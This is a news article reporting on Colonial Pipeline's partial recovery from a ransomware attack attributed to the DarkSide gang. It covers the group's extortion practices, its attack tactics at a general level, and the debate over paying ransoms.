Breach Notification , Critical Infrastructure Security , Cybercrime

Colonial Pipeline Starts Recovery From Ransomware

Report: DarkSide Ransomware Gang Infected Fuel Supplier
Colonial Pipeline Starts Recovery From Ransomware
Photo: Colonial Pipeline Co.

After a ransomware incident, Colonial Pipeline Co. says it has restored smaller pipelines that ship fuel to the U.S. East Coast, but its larger ones are still offline as it assesses safety.

See Also: Double-Click on Risk-Based Cybersecurity

The company ships millions of gallons per day of fuels such as gasoline, heating oil, jet and diesel from refineries in the South to East Coast destinations. The company says "smaller lateral lines between terminals and delivery points are now operational," according to an update on Sunday.

Four main lines, however, still are not functioning. Those lines were voluntarily taken offline Friday by the company after it discovered ransomware. The company has not given a timeline as to when full operations will resume (see: Colonial Pipeline Confirms Ransomware Causing Disruptions).

"We are in the process of restoring service to other laterals and will bring our full system back online only when we believe it is safe to do so, and in full compliance with the approval of all federal regulation," the company's Sunday update says.

Colonial Pipeline says it ships 45% of all of the fuel consumed on the East Coast, supplying some 50 million people. Its pipelines extend more than 5,500 miles. There are worries that a prolonged disruption will affect supplies.

As a result, the federal government issued an emergency declaration on Sunday to address possible fuel disruptions. The Federal Motor Carrier Safety Administration issued a regional emergency declaration that allows transport drivers stretching from the South through the Northeast to work more hours through June 8. It applies to 17 states and the District of Columbia.

In the past two days, Colonial says its personnel have "taken additional precautionary measures to help further monitor and protect the safety and security of its pipeline." It has hired the security firm FireEye Mandiant to assist with the investigation, The New York Times reports.

DarkSide Ransomware Group

The Associated Press, citing anonymous U.S. government sources, reports that the ransomware was planted by a criminal gang called DarkSide. Colonial Pipeline has not described what kind of threat or ransom demand the group has made.

Typically, ransomware operators demand a payment in bitcoin by a specific date to receive a decryptor and/or to refrain from publishing leaked data. If the ransom isn't met, the ransom may be increased. Some ransomware groups have set up websites to publicly release stolen data to increase the pressure.

DarkSide often releases stolen data, according to an April 1 blog post from the cybersecurity company Cybereason. DarkSide has demanded ransoms from $200,000 to $2 million, Cybereason writes. The group's website lists data from more than 70 organizations.

The last time DarkSide posted data on the domain, which is a .onion domain on the Tor network, was April 23. Colonial Pipeline's data is not yet on the site.

The group purports to follow a code of conduct that includes not infecting hospitals, hospices, schools, universities, nonprofit organizations and government agencies. It has also claimed to make charitable donations. The BBC reported in October 2020 that Children International, a charity, said it would not accept a nearly $10,000 donation it received from the group in bitcoin.

The group also isn't afraid to market itself. A researcher who goes by MalwareHunterTeam on Twitter noticed in January that DarkSide had features on its website for either press queries or recovery companies, which are ransom negotiators sometimes used by victims.

As far as its victims, "DarkSide is observed being used against targets in English-speaking countries and appears to avoid targets in countries associated with former Soviet Bloc nations," Cybereason writes.

Once it has gained access to an organization's systems, the group moves laterally and targets domain controllers, which are the backbone of an organization's IT infrastructure. Cybereason says the group then collects files, credentials and sensitive information.

When those operations are done, DarkSide uses the Microsoft scripting utility PowerShell to download the ransomware binary and puts it on a shared folder within the organization's domain controller itself.

"Later in the attack, after all data has been exfiltrated, the attackers use bitsadmin.exe to distribute the ransomware binary from the shared folder to other assets in the environment in order to maximize the damage," Cybereason writes.

Paying Ransoms Discouraged

Much about the incident against Colonial Pipeline is unknown, including how its network is structured and whether the ransomware affected its operational technology - the systems that control physical devices. One of the fears about attacks against critical infrastructure is that a cyber incident could result in injury or loss of life.

The Cybersecurity and Infrastructure Security Agency says that the Colonial Pipeline incident "underscores the threat that ransomware poses to organizations regardless of size or sector."

"We encourage every organization to take action to strengthen their cybersecurity posture to reduce their exposure to these types of threats," Eric Goldstein, CISA's executive assistant director for cybersecurity, says in a statement.

It remains unclear if Colonial Pipeline will pay a ransom. Experts generally discourage paying ransoms, as it creates an incentive for further attacks. But many organizations have paid, and some insurance policies may cover paying a ransom.

A recent report from the Institute for Security and Technology's Ransomware Task Force listed 48 suggestions created by cybersecurity and policy experts for how the ransomware problem could be curtailed. But the task force's members could not agree on whether ransomware payments should be banned by law (see: Fighting Ransomware: A Call for Cryptocurrency Regulation).

The task force, however, said that "while a company might determine that paying a ransom is economically rational, such a decision supports the criminal enterprise and is rarely in the public interest."

About the Author

Jeremy Kirk

Jeremy Kirk

Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.